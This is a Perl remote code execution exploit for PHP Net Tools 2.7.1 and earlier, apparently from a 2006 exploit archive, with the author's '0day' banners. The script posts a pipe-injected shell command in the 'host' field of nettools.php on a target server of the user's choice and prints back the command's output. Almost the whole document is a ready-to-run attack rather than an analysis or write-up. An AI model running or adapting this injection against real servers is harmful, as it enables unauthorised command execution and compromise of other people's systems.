PHP Net Tools <= 2.7.1 Remote Code Execution Exploit :

Date : 2006-04-18 Author : FOX_MULDER
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER ([email protected])
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools                     |
#Copyright (C) 2005 Eric Robertson |
[email protected]                |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
	use LWP 5.64;

	my $hostname = $ARGV[0];
	my $dir = $ARGV[1];
	my $command = $ARGV[2];

        if (@ARGV<2) {
	print "
Usage: ntools.pl www.site.com /dir/ "ls -la" 
";
	exit();
	}
	
	print "=======================================================
";
	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day
";
	print "PHP Net Tools Command Execution Exploit by FOX_MULDER
";
	print "[email protected]
";
	print "=======================================================
";

	my $browser = LWP::UserAgent->new;
	$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
	print "

[+]Sending request to server . . .
";
	
	my $url = "http://$hostname$dir/nettools.php";

	
	my $response = $browser->post( $url,[
		'ping' => '1',
        	'host' => "|$command"]);

 	my $code = $response->status_line;
        print "[+] HTTP RESPONSE $code
";
        print "
[+]Injecting command . . .
";
	$response->content =~ /blockquote>(.*)</blockquote>/s;
	print "$1
";

# milw0rm.com [2006-04-18]

C1

 

C2

 

C3